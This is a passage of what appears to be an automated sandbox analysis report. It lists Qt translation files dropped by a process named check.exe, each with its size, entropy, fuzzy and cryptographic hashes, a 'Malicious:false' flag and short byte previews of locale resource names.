                                                                                                                                                                                                                                      Entropy (8bit):5.790303416386852
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
                                                                                                                                                                                                                                      MD5:9297A6905B8B1823BF7E318D9138A104
                                                                                                                                                                                                                                      SHA1:3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
                                                                                                                                                                                                                                      SHA-256:C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
                                                                                                                                                                                                                                      SHA-512:01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9301
                                                                                                                                                                                                                                      Entropy (8bit):5.80411750798786
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
                                                                                                                                                                                                                                      MD5:47C3328D3918CF627112BB6C50E30B86
                                                                                                                                                                                                                                      SHA1:05705603AB3F28402A6C103E1C41DDFF21D140C0
                                                                                                                                                                                                                                      SHA-256:3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
                                                                                                                                                                                                                                      SHA-512:8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
                                                                                                                                                                                                                                      MD5:5A46979B45C67DD6312F33CCEA2ED7BC
                                                                                                                                                                                                                                      SHA1:4C56836B1FB10D9903B299CBCB925947D515B4C8
                                                                                                                                                                                                                                      SHA-256:BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
                                                                                                                                                                                                                                      SHA-512:BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
                                                                                                                                                                                                                                      MD5:2BB8C94D420D3BC344C79A01043BDC89
                                                                                                                                                                                                                                      SHA1:3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
                                                                                                                                                                                                                                      SHA-256:9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
                                                                                                                                                                                                                                      SHA-512:C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.599979504080125
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
                                                                                                                                                                                                                                      MD5:8A1EE3433304838CCD0EBE0A825E84D8
                                                                                                                                                                                                                                      SHA1:2B3476588350C5384E0F9A51FF2E3659E89B4846
                                                                                                                                                                                                                                      SHA-256:23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
                                                                                                                                                                                                                                      SHA-512:2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.652277257665055
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                                                      MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                                                      SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                                                      SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
                                                                                                                                                                                                                                      SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165383
                                                                                                                                                                                                                                      Entropy (8bit):4.805977227348512
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
                                                                                                                                                                                                                                      MD5:8992B652D1499F5D2F12674F3F875A35
                                                                                                                                                                                                                                      SHA1:E22766A49612F79156C550D83C6C230345DDA433
                                                                                                                                                                                                                                      SHA-256:47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
                                                                                                                                                                                                                                      SHA-512:9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):89
                                                                                                                                                                                                                                      Entropy (8bit):4.156834975253888
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
                                                                                                                                                                                                                                      MD5:19F1B919BB531E9E12E7F707BEBD8497
                                                                                                                                                                                                                                      SHA1:46E82683CEA28D877C73A5CE02F965BB1130FC62
                                                                                                                                                                                                                                      SHA-256:03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
                                                                                                                                                                                                                                      SHA-512:901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):161
                                                                                                                                                                                                                                      Entropy (8bit):3.8693516202048612
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
                                                                                                                                                                                                                                      MD5:D71EA9FEFD97464B178235150EC8759E
                                                                                                                                                                                                                                      SHA1:61026FE602FD1B8B442A0D341C6BD759EEC75488
                                                                                                                                                                                                                                      SHA-256:BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
                                                                                                                                                                                                                                      SHA-512:ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70334
                                                                                                                                                                                                                                      Entropy (8bit):4.732724622610353
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
                                                                                                                                                                                                                                      MD5:6656500F7A28EF820AE9F97FD47FB5BB
                                                                                                                                                                                                                                      SHA1:CC112B9C9513BCF7497F3417168B4C8A9F7640A9
                                                                                                                                                                                                                                      SHA-256:2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
                                                                                                                                                                                                                                      SHA-512:5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                                                                      Entropy (8bit):3.984562388316898
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
                                                                                                                                                                                                                                      MD5:F7A8C75408B9A34A2B185E76F51B7B85
                                                                                                                                                                                                                                      SHA1:065E987139C5FB809A6F9CDF3845BCD79707FDBB
                                                                                                                                                                                                                                      SHA-256:6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
                                                                                                                                                                                                                                      SHA-512:E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157
                                                                                                                                                                                                                                      Entropy (8bit):3.7731953311404336
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
                                                                                                                                                                                                                                      MD5:24C179481B5EF574F33E983A62A34D53
                                                                                                                                                                                                                                      SHA1:0A67F1ED8CA4A5182F504806F8D47D499789F2D2
                                                                                                                                                                                                                                      SHA-256:B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
                                                                                                                                                                                                                                      SHA-512:4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):228428
                                                                                                                                                                                                                                      Entropy (8bit):4.726953418955661
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
                                                                                                                                                                                                                                      MD5:D35A0FE35476BE8BD149CEE46E42B5E9
                                                                                                                                                                                                                                      SHA1:9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
                                                                                                                                                                                                                                      SHA-256:C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
                                                                                                                                                                                                                                      SHA-512:BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65851
                                                                                                                                                                                                                                      Entropy (8bit):4.7906769989650515
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
                                                                                                                                                                                                                                      MD5:0E85E0E0E7DDFE3D4BDE302F27047F9C
                                                                                                                                                                                                                                      SHA1:AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
                                                                                                                                                                                                                                      SHA-256:4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
                                                                                                                                                                                                                                      SHA-512:8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):110
                                                                                                                                                                                                                                      Entropy (8bit):3.630483009136986
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                                                      MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                                                      SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                                                      SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                                                      SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                                                                      Entropy (8bit):4.021402900389864
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                                                      MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                                                      SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                                                      SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                                                      SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117347
                                                                                                                                                                                                                                      Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                                                      MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                                                      SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                                                      SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                                                      SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):141
                                                                                                                                                                                                                                      Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                                                      MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                                                      SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                                                      SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                                                      SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):160017
                                                                                                                                                                                                                                      Entropy (8bit):5.35627970915292
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                                                      MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                                                      SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                                                      SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                                                      SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165337
                                                                                                                                                                                                                                      Entropy (8bit):5.332219158085151
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                                                      MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                                                      SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                                                      SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                                                      SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):210159
                                                                                                                                                                                                                                      Entropy (8bit):4.666388181115542
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                                                      MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                                                      SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                                                      SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
                                                                                                                                                                                                                                      SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):174701
                                                                                                                                                                                                                                      Entropy (8bit):4.87192387061682
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                                                      MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                                                      SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                                                      SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                                                      SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):181387
                                                                                                                                                                                                                                      Entropy (8bit):4.755193800761075
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                                                      MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                                                      SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                                                      SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                                                      SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):220467
                                                                                                                                                                                                                                      Entropy (8bit):4.626295310482312
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                                                      MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                                                      SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                                                      SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                                                      SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
